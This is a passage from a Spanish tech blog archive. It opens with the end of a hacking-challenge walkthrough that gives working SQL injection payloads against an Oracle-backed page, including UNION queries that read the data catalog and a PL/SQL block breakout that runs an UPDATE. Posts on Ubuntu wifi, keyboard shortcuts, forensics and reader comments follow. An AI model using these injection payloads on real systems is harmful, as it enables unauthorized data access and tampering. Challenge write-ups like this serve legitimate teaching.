Parece que algo no va bien, ya que a pesar de que la consulta aparenta no tener ningún problema sintáctico, su ejecución falla y, por tanto, la pecera aparece vacía. Esto es debido a que falta un pequeño detalle: prefijar el nombre de la tabla con el propietario de la misma. Ya que tenemos acceso al catálogo, podemos obtener el nombre de dicho propietario utilizando el mismo procedimiento que en el caso anterior, simplemente modificando la columna a la que estamos accediendo:

verPecera.aspx?user=' and 0=1 union select ascii(substr(OWNER,1,1)) from ALL_TAB_COLUMNS where lower(COLUMN_NAME)='numeropeces'--

Esta consulta devuelve el valor 83 ("S"). Continuando con el proceso determinamos que el propietario que estamos buscando es "SYS", por lo que esta consulta ya es válida y devolverá el número de participantes registrados en el reto:

verPecera.aspx?user=' and 0=1 union select count(*) from SYS.PECES--

La verdad es que con un poco de suerte nos podríamos haber ahorrado todo el procedimiento descrito anteriormente, ya que los nombres de todos los objetos que hemos obtenido eran bastante lógicos y perfectamente deducibles. De cualquier forma, ahora que ya tenemos comprobados todos los detalles relativos a la tabla, solamente nos falta encontrar la forma de ejecutar la consulta de actualización.

Toda la documentación que podemos encontrar sobre inyección SQL en Oracle coincide en que de forma general no se pueden ejecutar dos instrucciones diferentes en un solo paso (como sí se podría hacer en SQL Server, separándolas por un punto y coma). Esto solamente es factible para casos muy concretos. Si dejamos de lado las técnicas que involucran otro tipo de vulnerabilidades (como desbordamientos de buffer, etc.), solamente nos quedará la posibilidad de inyectar dicha instrucción dentro de un bloque PL/SQL y todo apunta a que las consultas que hemos estado ejecutando hasta el momento no se encuentran dentro de ninguno de esos bloques.

Aquí es cuando entra en juego ese misterioso desplegable que especifica el usuario destinatario del pez a añadir. Si intentamos las típicas pruebas para determinar si el parámetro es vulnerable, veremos que algo falla y que no conseguimos añadir el pez:

UsuarioExistente' and '1'='1

Sin embargo, si modificamos el contenido del desplegable con otro tipo de instrucciones observaremos que sí conseguiremos añadir el pez, como por ejemplo el nombre de nuestro usuario concatenado de esta manera (o de cualquier otra que se nos hubiera ocurrido con la finalidad de comprobar si se están procesando las funciones propias del gestor de bases de datos subyacente):

'||CHR(ASCII('U'))||CHR(ASCII('s'))|| CHR(ASCII('u'))||'arioExistente

Por cierto, para modificar el contenido del cuadro de lista desplegable podemos optar por varias alternativas. Por ejemplo, podemos intercalar un proxy (como Odysseus), o usar algún complemento para el navegador (como Web Developer para FireFox, o la Developer Toolbar para Internet Explorer), etc.

Ahora que hemos asumido que estamos dentro de un bloque de PL/SQL y que hemos conseguido que funcionen ciertas inyecciones propias de Oracle, vamos a intentar inyectar una consulta de actualización. Para ello podemos ponernos en la piel del programador, imaginando que tenemos que implementar la invocación de algún procedimiento dentro de un bloque PL/SQL. En el caso más simple, lo primero que tendremos que hacer es declarar el bloque con instrucciones "BEGIN" y "END" y lo segundo es la invocación del procedimiento dentro de dicho bloque. Por ejemplo:

"BEGIN procedimiento('" + parámetro + "'); END;"

Por tanto, nuestra inyección deberá cerrar la cadena, el paréntesis y terminar el bloque PL/SQL, comentando el resto de la instrucción con un guión doble (sin olvidar la confirmación de la actualización con la instrucción COMMIT):

UsuarioExistente'); update SYS.PECES set NUMEROPECES=10; COMMIT; END;--

La inyección mostrada establece en 10 el número de peces de todos los usuarios (de ahí que apareciera ese mensaje de aviso de la sección Léeme que decía "… y ten cuidado no te quiten peces"). Para actualizar únicamente el número de peces de nuestro usuario, evidentemente tendremos que añadir una cláusula WHERE a la UPDATE.

Pues hasta aquí llegaba la primera fase del reto. ¿A que no era tan difícil? Bueno, en realidad tampoco era tan difícil dejarse algún pequeño detalle en cualquiera de los pasos, que es lo que nos suele hacer perder más tiempo del necesario a todos.

miércoles, mayo 07, 2008

Hols en Valencia

Hola Valencia!

Un año después, los Hands On Lab vuelven en el mes de Julio a Valencia, gracias una vez más a la colaboración de la Bolsa de Valencia que siempre nos dice que sí [mil gracias!], así que os dejo aquí la info para todos los que habéis preguntado cuando regresaban y me ahorro contestaros los mails a todos. Tenéis toda la información en la siguiente URL:
Hands On Lab en Valencia
Semana de Windows Server 2008

07-08 [16:00-19:00] HOL-WIN31 W2K8. Administración
08       [09:00-15:00] HOL-WIN36 W2K8. Core Version
09       [09:00-15:00] HOL-WIN32 W2K8. Active Directory
09-10 [16:00-19:00]HOL-WIN35 W2K8. Network Access Protection
10       [09:00-15:00] HOL-WIN00 W2K8. IIS 7.0
11       [09:00-15:00] HOL-WIN44 W2K8. Terminal Services

Semana de SQL Server 2K8 y Office SharePoint Portal Server 2K7

SQL Server 2K8

14-15 [16:00-19:00] HOL-SQL22 SQL 2K8. Implantación & Configuración
16-17 [16:00-19:00] HOL-SQL23 SQL 2K8. Administración y Seguridad

Office SharePoint Portal Server 2K7 [MOSS2k7]

15 [09:00-15:00] HOL-SPS04 Office Windows SharePoint Services V3
16 [09:00-15:00] HOL-SPS09 MOSS 2K7. Arquitectura
17 [09:00-15:00] HOL-SPS08 MOSS 2K7. Gestión de Contenido
18 [09:00-15:00] HOL-SPS11 MOSS 2K7. Workflows y Procesos de Negocio

Semana de Seguridad Informática

22-24 ProtégeIT: Network Security

Amenazas y Riesgos de las redes Wireless. Ataques Wifi y sistemas de protección. Ataques de Wiretapping. Sniffers. Técnicas de DOS. Ataques y protección contra situaciones Man In The Middle. ARP-Poissoning. Técnicas de Spoofing. Voz IP. Arquitectura y seguridad VoIP. Sistemas de Mensajería Instantánea Seguros. Sistemas de cifrado y autenticación de comunicaciones. IPSec. SSL. Kerberos. LDAP-s. Arquitectura Firewalls. DMZs. Sistemas de VPN. L2TP y PPTP.

Mas ínformación: Hands On Lab en Valencia

Saludos Malignos!

"Atajos" en Gnome+Ubuntu 8.04

Hola queridos jugadores!

Gracias a uno de los comentarios anónimos del post anterior (en el cual solicitaba ayuda porque de verdad no tenía ni idea de como coño se hacía), concretamente al primero (mil gracias!). He podido aprender como poner un atajo de teclado a un programa en mi Gnome sobre Ubuntu 8.04. La idea es poder utilizar una combinación de teclas y que se ejecute un programa. ¿Cómo se hace?

Fase 1: Entra en el "registro"

Si a mi me dicen que voy a tener que configurar un registro para poner un atajo de teclado en un escritorio gráfico me parto de risa, ¡seguro!..., pero no, hay que hacerlo. Para ello hay que ejecutar gconf-editor como bien explicaba nuestro comentario anónimo. Sí, al más puro estilo regedit de Windows.

Abriendo el "registro"
Fase 2: Añade una combinación de teclas como comando

Una vez hay dentro del registro sigues la ruta de apps->metacity->Golbal_keybindings y aparecen 12 claves de registro que van de run_command_1 hasta run_command_12. Estas claves representan 12 combinaciones de ejecución de comandos. Es decir, 12 posibles llamadas a programas para su ejecución.

Creando una combinación
Fase 3: Asocia una combinación a un programa

Una vez que has asociado que run_command_1 es + a, como yo he hecho en mi ejemplo, ya puedes asociar que run_command_1 es, en este caso la llamada a la calculadora.

Asociando el programa a la combinación
Conclusión

Vale, como usable, usable... pues no se que pensaréis vosotros, pero yo le veo algunas peguillas:

1- Sólo hay 12 comandos, he intentado crear alguno más pero me dice que "la clave no tiene esquema" y no ha funcionado. Para ello he probado primero con un nombre simbólico como "Calculadora" y luego con otro como "run_command_13" y en ambos ha fallado.

2.- He puesto la combinación de teclas +ñ pero... no le ha gustado la ñ. Maldita sea!

Despedida

Gracias anónimo por tu explicación certera. A todos los demás... ¡gracias por jugar! Otra vez será. Habrá más oportunidades en el juego de la usabilidad. Creo que el comentario anónimo ha sido muy acertado en su apreciación final de "intuitivo".

He probado a ver si la configuración se almacena por usuario y sí, es decir, hay algo similar al HKEY_CURRENT_USER del registro de Windows, pero si entras como root no puedes tocarlo con el gconf-editor, así que supongo que habrá que tocar un ficherito de configuración o usar alguna otra herramienta que aún no he encontrado al alcande de mi ratón.

Saludos Malignos!

martes, mayo 06, 2008

No encuentro el atajo!!

Hola navegantes!

¡este es un post pidiendo ayuda! Estoy perdido y no encuentro atajos. Necesito hacer que ciertos caminos sean más cortos... y no puedo encontrarlos. He buscado en las propiedades, he buscado en el baúl de los recuerdos, en el fondo de tu armario y debajo de tu sujetador ... y no lo encuentro.

¿Cómo coño puedo asociar una combinación de teclas a la ejecución de un programa el Gnome de mi Ubuntu?

En mi querido, amado y añorado Windows Vista es tan facil como hacer botón derecho sobre el icono del acceso directo y configurar la combinación de teclas.

Ctrl+Alt+ñ y a darle a los comics!
He intentado encontrar algo similar en Gnome... y nada, lo que aparece en las propiedades de los lanzadores es para cambiar el icono, el ejecutable y poco más.

Propiedades de la Calculadora
También intenté, para no extrañar tanto la "inutil tecla" de la banderita de Windows, configurar "tecla de Inicio + R" para poder lanzar el ejecutar, pero resulta que en la herramienta de "Combinaciones de Tecla" no se puede añadir más teclas y la tecla de Windows no puede ser pulsada junto con otra.... Sniff.

No puedo dar "Inicio+R"
Venga, va, ¿qué programita debo hacer apt-get install para tener atajos de teclado?

Vista "aloviu"!

Saludos Malignos!

La puerta trasera

Esto es lo que pasa cuando alguien tiene un Blog de investigación basado en leer cosas de Internet y no tener ni puta idea de Seguridad Informática.

Todos habréis oido, o leído, sobre la famosa "puerta trasera" que el equipo de Spectra "ha abierto" a los cuerpos de seguridad del estado para que investigen sobre que películas porno te has bajado, con quién chateas en el messenger o si tienes pagada la licencia del Office 2003.

Esa supuesta "puerta trasera" no son más que un recopilatorio de herramientas de análisis forense tuneadas para ayudar en la labor a un profesional que tiene que hacer un análisis forense Online de una máquina. Sí, el "Computer Online Forensic Evidence Extractor"es un conjunto de herramientas, las cuales tuve la oportunidad de ver en vivo hace ya más de tres años (sí, una versión mucho más vieja) en un MVP Security Summit en RedMon, que lo único que recogen es la información que cualquier analista recogería.

Yo vi "la puerta trasera" en acción para detectar un malware y hacía cosas "tan fraudulentas y malosas" como sacar las conexiones TCP/UDP, como mirar la tabla caché de direcciones ARP, como sacar listados de los ficheros más importantes del sistema ordenados por fechas, buscar archivos en cachés, listados de procesos (esto debe ser muy chungo), etc... Luego lo metían en una herramientita que hacía cosas malas, como ordenar por fechas, por procesos, por accesos, etc... y en mi caso, descubrir como un bicho se había colado en la papelera de reciclaje de forma oculta.

Sólo cosas que un analísta, con permisos de administración de una máquina, puede buscar Online. Sí, la O de Cofee es Online e implica acceso a comandos a nivel de administración. Podría haber sido O de Offline y realizar lo mismo que miles de herramientas realizan Offline, como por ejemplo copiar el pagefile, ordenar por fechas, buscar ficheros en caché, sacar los procesos de la memoria RAM, etc..., pero no es el caso. (Aunque me ha parecido oir en un rincón que hay gente en Spectra que tiene pendrives con herramientas de análisis forense offline y le llama CÖFEE...o tal vez no).

Para todos los fantasticos que buscan el fin de la encriptación, sólo quisiera recordaros que, si la máquina está arrancada... Bitlocker ya desencripta el disco duro, pues, como muchos sabéis (algún técnicoless aún no) Bitlocker protege el sistema contra atáques, y análisis forenses, Offline.

No creo que haya que justificar que un equipo de seguridad recapitule un montón de herramientas forenses en un pendrive y se lo entregue a alguien (creo que existen cientos de distros y conjuntos de herramientas para auditoría y análisis forense en Internet tanto para Windows como para Linux), pero en mi opinión creo que lo único que ha hecho el equipo de seguridad es intentar ayudar a los analistas forenses que tan puteados se encuentran (y lo digo con conocimiento de causa..) con el análisis forense offline de las máquinas con Bitlocker porqué... NO, tampoco hay una "puerta trasera" (cómo muchos especulaban) que Spectra haya dado a ningún país/estado/dictadura/Republica_Independiente_de_mi_casa que permita descifrar el Bitlocker de forma automática.

Sin embargo, los técnicoless de turno, los bloggers de postín y mal follamiento, los amantes de la conspiranóia que Investigan/Opinan y se kriptonizan cuando se encuentran con palabros complejos como FORENSE ONLINE, rápidamente descubren "la puerta trasera de Windows". Por favor, como seguro que ya estará en algún sitio publicada (a pesar de ir bajo NDA, como el que tienen los MVPs), que alguien haga un debugger en ASM y publique... "LA PUERTA TRASERA".

Yo recuerdo una película que me gustaba que también tenía una puerta, se llamaba... "Detrás de la Puerta Verde" y ahí si que vi meter cosas por la puerta trasera.

PD: ¡Qué triste ver cómo muchos copian y pegan las mismas tonterías!

Saludos Malignos!

lunes, mayo 05, 2008

La Wifi en Ubuntu 8.04 (II de III)

***************************************************************************************
La Wifi en Ubuntu 8.04 (I de III)
La Wifi en Ubuntu 8.04 (II de III)
La Wifi en Ubuntu 8.04 (III de III)
***************************************************************************************

Hola amigos!

Herramienta Redes Inalámbricas

Esta herramienta es también parte del conjunto de tools Network Manager. En ella se pueden adminsitrar las configuraciones de redes inalámbricas con las que deseas trabajar, incluidas aquellas con ESSID oculto. Por cada red se crea un registro que almacena información de la wifi a la que te quieres conectar en caso de estar cerca de ellas. Esta información se va a utilizar sólo en caso de petición de conexión a una de esas redes on demand (si tienes el modo itinerante) o si la red es detectada (automáticamente).

Tiene una serie de curiosidades respecto a usabilidad bastante “peculiares” que os voy a "llorar".

¿Cómo se crea una nueva red?

La primera de ellas es que a los programadores se les ha olvidado meter el botón de “agregar nueva red” con lo cual saber como coño llega una red aquí es un poco dificil. La solución es que una red llega aquí en cuanto te conectas a una de ellas con una herramienta gráfica, es decir, seleccionando alguna de las formas que existen en el “iconito de arriba a la derecha”.

Esto en Windows es distinto, pues cuando te conectas a una red wifi por primera vez te da tres opciones: Guardar la red para todos los usuarios, Guardar la red sólo para este usuario o No guardar la red. Aquí se almacena automáticamente en un fichero y hay que borrarla manualmente.

¿Dónde está la ayuda?

La segunda curiosidad es que si no sabes como conectarte con la wifi a Internet y buscas ayuda, la ayuda está en ... Internet. Esto ha debido ser algún chiste.

Ayuda -> http://www.gnome.org/projects/NetworkManager/
Pero además, la ayuda ofrecida es bastante mala.

¿Cuál es el orden de conexión?

La tercera curiosidad es...¿Cual es el orden si tienes más de una red almacenada? ¿Es orden alfabético? ¿Orden de entrada? ¿Puedo ordenarlas de alguna forma? Yo he configurado 2 redes y tras varias pruebas parece que el orden es alfabético (al menos en mi equipo) con lo que tengo que tener mucho cuidado como llamo a las redes.

¿Dónde elijo el orden de conexión? ¿Dónde se agregan nuevas redes?
¿IP Fija o WPA/WPA2-Empresarial?

La cuarta curiosidad es que, a diferencia de la otra herramienta de configuración manual, aquí sí se pueden configurar WPA y WPA2 con soluciones empresariales y sí se puede seleccionar el protocolo de cifrado, pero... no se puede configurar la dirección IP ni la puerta de enlace, lo cual obligaría a utilizar la herramienta de Configuración Manual perdiendo de nuevo el Roaming o la detección de redes y además la posibilidad de utilizar WPA/WPA2-Empresarial con RADIUS (con las herramientas gráficas, supongo que a manopla se conseguirá hacer rular).

Bien, esto se parece más a cómo lo hace Windows, dónde el link y la configuración de red van por separados.

Pero... ¿qué sucede si tu necesitas configurar una dirección IP estática? Pues bien, si tocas el archivo /etc/network/interfaces y pones una dirección ip se acabó la detección de redes y por tanto no puedes usar la selección de la red en el iconito de arriba a la derecha.

Conclusión, si tienes un entorno no configurable con la herramienta de Configuración Manual, es decir, que no funcione con WEP, WPA-PSK, WPA2-PSK o quieres que te funcione el roaming de detección de redes, entonces la IP la tienes que tener por DHCP o ponersela “a manopla” una vez te hayas conectado a la red mediante comandos.

Saludos Malignos!

***************************************************************************************
La Wifi en Ubuntu 8.04 (I de III)
La Wifi en Ubuntu 8.04 (II de III)
La Wifi en Ubuntu 8.04 (III de III)
***************************************************************************************

domingo, mayo 04, 2008

Spaghettis con tomate

Hola, hola!

Seguro que habéis leido alguna vez eso de "spaghetti code, but it works!". Es una forma de decir: "lo hice para mi, así que no me pidas que lo haga como tú quieres, si quieres, te lo programas tú, waperas". Esto es algo común en los exploits y en otros programas en los que los usuarios no pueden exigir más.

En mi odisea repasando los ficheros de configuración de todas las herramientas wifi de mi Ubuntu 8.04 me tope con el fichero de configuración Glade del applet del network manager dónde me encontré con el identificador de un cuadro de diálogo como este:

El dialago del driver
Reconozco que me hizo gracia ver esto. Siempre he oido eso de que los didentificadores deben ser autoinformativos, pero en este caso se lo han pasado por el forro. Digamos que esto es un "spaghetti identifier".

Algo similar ha pasado en uno de los paquetes de Debian, en este caso el programador ha aprovechado para dejarle en el código un mensaje a "un amigo".

Sebastian enfadadito
Como se puede ver, en el paquete de quodlibet, el programador ha dejado una ruta a un fichero que dice algo así como "Sebastian Droge, por favor, ahogate en un cubo de pollas". Vamos, ha añadido tomate a su "spaghetti code".

Claro, el amigo Sebastian se ha enfadado, pero... si no te gusta...¡no uses este programa!. Claro, esa no es la solución y en Debian muchos han dicho que no es buen estilo, que Debian no debe permitir esto, etc.. Además, hay voces que han empezado a preguntarse si esto podría terminar en una demanda a Debian y debatir sobre cual es la responsabilidad del código, etc...

Puedes seguir todo el debate en la indidencia abierta sobre este suceso.

En fin, la pena, anecdota a parte, es que en muchos proyectos nos vamos a encontrar "spaghetti code" y esto es malo para depurar y configurar cosas.

Saludos Malignos!

sábado, mayo 03, 2008

La Wifi en Ubuntu 8.04 (I de III)

***************************************************************************************
La Wifi en Ubuntu 8.04 (I de III)
La Wifi en Ubuntu 8.04 (II de III)
La Wifi en Ubuntu 8.04 (III de III)
***************************************************************************************

Introducción

Me ha llevado muchas más horas de lo que podía ni siquiera imaginar, pero al fin creo que conozco como funcionan las herramientas para configurar la wifi en la Ubuntu 8.04. Las aventuras han sido muy divertidas sobre todo teniendo la ayuda “visual” de los iconos de la red. Al final, este conocimiento me ha llevado a que he tenido que configurar mi router Wifi como le venía bien a este Ubuntu 8.04. Supongo, que, metiendome más a bajo nivel del que me he metido (y eso que he llegado a intentar configurar esto con el iwpriv, mirando los scripts del wpa_suplicant e intentando tunear el demonio de autoip) se podría conseguir configurar el "hipercomplejo" entorno que tengo: ESSID no publicado, IP Fija, WPA-PSK con TKIP. Eso es todo, pero si piensas que es fácil en esta Ubuntu... te invito a "tomar un café en casa".

La detección de Redes

Cuando te instalas Ubuntu 8.04 aparece arriba a la derecha un icono que sirve para darte información sobre las redes disponibles. Al principio, nada más instalarlo, y si has tenido la suerte de que te ha detectado la tarjeta de red (si no te lo ha hecho, este no es lugar dónde tienes que venir a buscar información) aparece buscando las redes wifis cercanas. Esa herramienta lo único que realiza es un escaneo igual al que se puede hacer manualmente con iwlist dispositivo_wifi scanning.

Para ver como se llama tu dispositivo y si te lo ha detectado, “tan sencillo” como ifconfig.

Imagen 1: Ifconfig
En la imagen se puede ver como el dispositivo de mi tarjeta se llama wlan0. Una vez que sabes el nombre del dispositivo, la información que recibes en el icono arriba a la derecha (si no has puesto configuración manual alguna) es la misma que usar el comando iwlist wlan0 scanning.

Si no estás conectado a ninguna red wifi aparecerá la lista de todas las redes disponibles, pero si te has conectado a una con iwlist sólo se descubren la red a la que estás conectado.

Imagen 2: Iwlist sin conectar a nada
Como se ve, antes de conectarme aparecen muchas redes, pero una vez conectado sólo aparece la red a la que estás conectado.

Imagen 3: Iwlist conectado
Perdida de Scaneo de redes. Configuración Manual

Imagen 4: Herramienta de "Configuración Manual"
Si activas la configuración manual de la red, entonces se acabó la detección de redes. La herramienta de configuración de redes Network Manager que aparece cuando entras en el modo Configuración Manual lo que hace es dejar el archivo /etc/network/interfaces límpio para saber que tiene que escanear en busca de redes (lo que el sistema llama en español “Modo Itinerante”) o le pone información para configurar tu red y por tanto se acabó el escanear redes automáticamente.

Esta aplicación funciona de una manera muy curiosa, pues configura una red a la que se va a conectar si y sólo sí, la detecta en el espectro, es decir, si la red no está ocultando su SSID. Esto sucede porque al configurarse el fichero /etc/network/interfaces se desactiva el “modo itinerante” y no busca más redes.

Escaneo de Redes ocultas

En los sistemas Windows, se realiza un escaneo de detección de redes ocultas intentando conectarse a ellas. Este sistema de Windows puede ser utilizado para poder atacar a clientes que buscan redes ocultas con nombres conocidos, como “default”, “wifi”, “myWifi”, etc.. para que un atacane simule ser el AP y le de conexión.

Una vez que la víctima se ha conectado se realiza un ataque MITM simulando ser el AP en entornos públicos. Esto está muy bien para ataques MITM o para intentar robar el hash de intento de autenticación de WEP o WPA/WPA2-PSK, pero a día de hoy los ataques WPA/WPA2-PSK son por diccionario o fuerza bruta y correrías el mismo riesgo en cualquier conexión normal. Así que desactivar el descubrimiento de redes ocultas me parece mala idea.

Conclusión, si tines el ESSID oculto no va a conectarse de esta forma automáticamente y esta forma es útil para poder conectarse de forma automática con IP estática a redes con el SSID publicado.

Como gracia añadida de esta herramienta tenemos que te permite seleccionar el protocolo, WEP ASCII (cosa que iwconfig no tiene soportado todavía según el man de la Ubuntu 8.04), WEP Hexadecimal, WPA-PSK y WPA2-PSK. Es decir, no permite ninguna configuración con redes Wireless con infraestructuras avanzadas con WPA-EAP, WPA-EAP-TLS, WPA-PEAP, WPA-PEAP-TLS, ni sus hermanas en WPA2 ni, por supuesto, el famoso TTLS de CISCO. Cómo curiosidad final de esta herramienta sucede que tampoco se puede configurar el sistema de cifrado que vas a utilizar, es decir, si quieres TKIP o AES.

Imagen 5: Si pones IP estática o tocas /etc/network/interfaces se desactiva el modo Itinerante
Conclusión, usa la configuración manual de la wireless cuando tengas una WIFI que publique el ESSID y necesites una dirección IP estática con WEP, WPA-PSK o WPA2-PSK.

Tiene como ayuda, que puedes tener creados varios pefiles que deberás ir seleccionando en cada situación para saber si quieres Modo Itinerante o no que lo que le permite a la herramienta es tener diferentes configuraciones del fichero /etc/network/interfaces.

Cómo gracia de usabilidad, cuando configuras esta herramienta necesitas permiso de adminsitración, así que hay que desbloquearla. Cuando miras en los detalles que aplicación va a usar esto te da una información bastante pobre. En mi caso, la aplicación (unknown) que es famosa en el mundo entero.

Despedida de hoy

Bueno, hasta aquí por hoy, mañana más que me quedan muchas cosas que contar de la Wifi en Ubuntu. No os preocupéis, es posible configurar los WPA/WPA2-Empresariales, pero eso sí, con ESSID publicos si no olvidate de las herramientas gráficas y ya os contaré como van el iwconfig, iwpriv y el wpa_supplicant que tienen su aquel.

Como corolario final, para los amantes de configurar wifis os haré un tutorial en Vista técnica de como configurar las wifis en Windows Vista.

PD: ¿Por qué no existe el famoso botón de "Actualizar wifis disponibles"?

Saludos Malignos!

***************************************************************************************
La Wifi en Ubuntu 8.04 (I de III)
La Wifi en Ubuntu 8.04 (II de III)
La Wifi en Ubuntu 8.04 (III de III)
***************************************************************************************

viernes, mayo 02, 2008

El arte de programar

Mi primo Laggy siempre se maravilla de este tipo de cosas, del resolvedor de sudokus más pequeño del mundo, del sistema de ordenación de números de teléfono que menos memoria ocupa, de las sorpresas que dan los tipos de datos en diferentes implementaciones debido a los sistemas de codificación.

Son obras de arte de la programación que merecen la atención y admiración. Yo no suelo publicar muchas cosas de esas en este blog, porque, como ya sabéis este blog nació única y exclusivamente para meterse con Ubuntu. Sin embargo, hoy quiero dejaros esta pequeña obra de arte.

El Mario Bros en 14 Kas y escrito en Javascript. Con dos cojones y un palito.

Mario en la Web
El amigo le ha puesto hasta audio y hay dos versiones para poder jugar en dispositivos con pantallitas pequeñitas. Sin embargo el plugin que necesito para el audio parece que no está disponible para mi nuevo desktop (malditos monopolios!).

La velocidad y la usabilidad (bonita palabra!) del juego es genial, el programador ha hecho que de verdad sea jugable a través de javascript.

Saludos Malignos!

jueves, mayo 01, 2008

Mis primeros mensajes de usabilidad

Hola amigos,

como práctica para mi GIMP he decidido dejaros algunos de los primeros "mensajes de accesibilidad" que he tenido con mi Ubuntu, todos son fáciles de entender por cualquiera. Vamos a empezar poquito a poco que tengo que estar mucho tiempo con este sistema (posteo desde él, a ver que os vais a pensar...).

Mensaje 1: El error Inexperado

Puse mal la password de algo equivalente al UAC [;)] y resulta que el mensaje es un error inexperado. ¡Qué tierno!

No es tan inexperado. Di a Cancelar
Menaje 2: ¿Para qué? ¡Paraguayo!

El asunto es que antes de dar la contraseña en el error 1 quería saber que info me daba sobre el uso que se iba a dar con ella. Y resulta que lo va a utilizar la aplicación "Unknown". Y yo que creía que era para el Network Manager.

Respuesta a lo Gila. Alguien va a usar algo...
¿Y me lo explicas en Castellano? Es que yo seleccioné castellano en la instalación, ¿sabes?. No, no seleccioné Spanglish.

Mensaje 3: ¡Ayuda!, ¡no me puedo conectar a Inet!

En plena guerra con la Wifi me da por buscar la ayuda. Quería saber si la password que tenía que meter en la configuración de la WPA-PSK podía ir en ascii o tenía que ir, como sucede con el iwconfig (pq no está soportado la opción s:password), en hexadecimal y la ayuda para conectarme está ... en Internet.

La ayuda para conectarse a Internet...está en Internet

Claro, si estás en casa tiras cable, pero si estás en un aeropuerto...Bueno, pues me conecté y ésta es toda la ayuda que tenemos. ¡Está clarisimo todo!

Mensaje 4: ¿Qué se ha muerto quién?

Este fue genial, cambié el nombre al ordenador y petó... El demonio de administración de preferencias... Uff... esta guerra... para otro día.

¿...Y esto es grave?
Nada, regreso al nombre anterior un botonazo, un reinicio y como nuevo. Me estuvo saliendo este error 3 reinicios, luego, como vino.. se fue, antes de que pudiera investigarlo más a fondo. Además la info la tenía de nuevo en Spanglish así que cualquiera que sepa spanglish puede enterarse.

Así fueron mis primeros momentos con la usabilidad de Ubuntu... todo diversión.

Saludos MAlignos!

Respuesta a comentarios

Hola amig@s..¿o no?!

Muchos de vosotros me decís que no os leéis todos los comentarios de las entradas, así que, para que no queden en el vacio, he contestado todos los comentarios de la entrada "Adoro mi buena Vista" y los pongo en un post nuevo.

Para que no caiga en saco roto ningún comentario.

Saludos Malignos!

DarkTuxVader dijo...
Joder Chemita que mal te veo, estas con el mono tron!! vamos vamos que no será tan malo, la verdad es que si tienes problemas, mima!!! nada será mejor que lo dejes esto es como el que es adicto al vino, si toma cerveza ya no es lo mismo.

Esto va a ser como la publicidad del MediaTonto, mira que tienen que ser raros toda esa masa de getne que usa Ubuntu... uuuum gente extraña!!

Red Hat esta guay, y OpenSuse la reOstia!!...

Tranquilo hombre tranquilo, al final el 'lupulo' seguro que no amarga tanto.

@DarktuxVader,

acepté el reto por la usabilidad de ubuntu y de momento nada más que he tenido malas experiencias. Pero sigo con ello y todo lo iré publicando. Que Linux me gusta es un hecho, pero que esta versión de Ubuntu está a años luz de Windows Vista en usabilidad es un hecho también.

Anónimo dijo...
Aunque sé que lo sabes y sólo lo dices por molestar a los linuxeros, ahí va: en The Gimp - menú Imagen - Lienzo al tamaño de la selección.

@Anónimo, gracias, ahora ya lo sé, pero no lo sabía. Busqué la herramienta en el menú de herramientas como está en Photoshop y no la encontré. Después probé a hacer una nueva imagen con una selección copiada con la esperanza que la nueva imagen tuviera el tamaño de la selección, pero no lo hizo y por último pegué una selección mayor que el lienzo con la esperanza de que me agrandara el lienzo a petición, pero tampoco lo hizo. Gracias por la info!

FilEMASTER dijo...
Que bien me lo voy a pasar leyendote este mes...

@Filemaster....tú con estas cosas disfrutas...

Brero dijo...
Chema, das hasta lástima.

Hay un salto de línea muy inoportuno que juega malas pasadas porque he leído "me tiraría a mi viejo".

@Brero, ¡Cuanto tiempo! Sí, doy lástima, estoy perdiendo mucho tiempo con esto y mi tiempo es limitado... Sniff.

PepeElMachacante dijo...
@filemaster

a ti te va la caña,no???

pues yo tb me lo voy a pasar muy bien, y cuando no sepa que decir tiro de demagogia becerril, y punto...

@PepeElMachante, que sea divertido y sin mala uva ;)

FilEMASTER dijo...
SEEEEEEEEEEEEEE

Caña powaaaaaaaaaaa

Pero amos que va a ser un mes interesante... eso no lo dudo

PD: Maligno montate un twitter ! !

@Filemaster, ya me monté un twitter genérico

Jandro dijo...
Jaaaaaaaaaaa, el Firefox!!!, ese es mi eterno problema, (ya veras cuando tengas que ver los flash, te vas a morir de risa), y sobre todo cuando el cargar una pagina se tira el tripe comparado con el explorer o el firefox instalado el windows o por ejemplo, en los gifs animados, el ubuntu tira del 100% del navegador comparado con el de windows, ni se inmuta el procesador.

@Jandro, la verdad es que me parece fatal que hayan metido una beta aquí. Ale! todos betatesters!. Y se me ha petado ya más de una vez.

Anónimo dijo...
Supongo que la adaptación no es tan sencilla como algunos dicen. Tampoco esta siendo facil para muchos pasar de Windows XP a Windows Vista. No fue nada facil para mi configurarle la red a mi familia en el ordenador nuevo con el flamante Vista, y eso que con XP lo hacia en cuestion de segundos.

Cuando ya lo tienes por la mano, entonces parece supersencillo. Lo mismo deberia pasarte con Ubuntu.

Sobre el tema de la ayuda estoy totalmente de acuerdo. Aunque me pregunte si alguna vez te ha servido de algo la ayuda de windows. A mi practicamente nunca.

Si lo que quieres es escribir algo tan tendencioso como los que critican Vista el primer dia que se lo instalan, lo estas consiguiendo. Pero tiene gracia que te pases la vida criticando tecnicoless y luego tus criticas a ubuntu se basen en que no has encontrado no se que opcion en el GIMP, que tarda mas en arrancar (pq el Vista lo hibernas) o que no has sido capaz de configurar el Wifi.

Mi primer dia con Vista tarde mas de una hora en configurar la red porque no habia DHCP y necesitaba poner la IP manualmente.

El puto Vista no paraba de decirme que había un problema, que lo estaba solucionando, que lo habia solucionado... y volvia a haber un problema, y no se salia del bucle.

Emili

@Anónimo/Emili

Siempre que hay aglo nuevo hay que aprender. Mi Vista arranca mucho más rápido que el Ubuntu y no, no está hibernado el Vista. Además, desde que cambié el nombre al equipo (parece que Putubuntu no le sentó bien) y petó me arranca con un mensaje de error de "Ha habido un error con el administrador de preferencias". Entre mis taréas está encontrar de dónde viene ese error de las narices.

Respecto a GIMP, comparado con el GIMP que yo conocí, parece muy mejorado. Ojala mi problema con la Wifi fuera de una hora. Estoy escribiendo unos manualitos sobre la Wifi en Ubuntu que publicaré para que toda la comunidad pueda disfrutar de algo más de información que lo que he encontrado yo.

Prometeo Lucifer dijo...
Decepción total... tanto necesitas currar con Vindous que tienes que mentir por si los jefes leen el blog; déjate de mentiras. Vista pide más recursos y tarda mucho más al cargar; y entre otras cosas yo me pasé definitivamente a GnuLinux cuando salio Vista e instalé Ubuntu(para probarlo sin prejuicios), y al poco tiempo me enganché a Ubuntu; de hecho una configuración de red simple siempre es más fácil con ubuntu.

Si esto va de contar mentiras, no subestimes el poder de google; y desde cualquier sitio patético bájate el código fuente de Vista e intenta compilarlo con un compilador libre por seguridad y cuestiones morales (no debería darte problemas que son pocas líneas) y mueves el programa a /usr/local/bin y así lo incluirás en el PATH; y desde una terminal simplemente ejecuta:
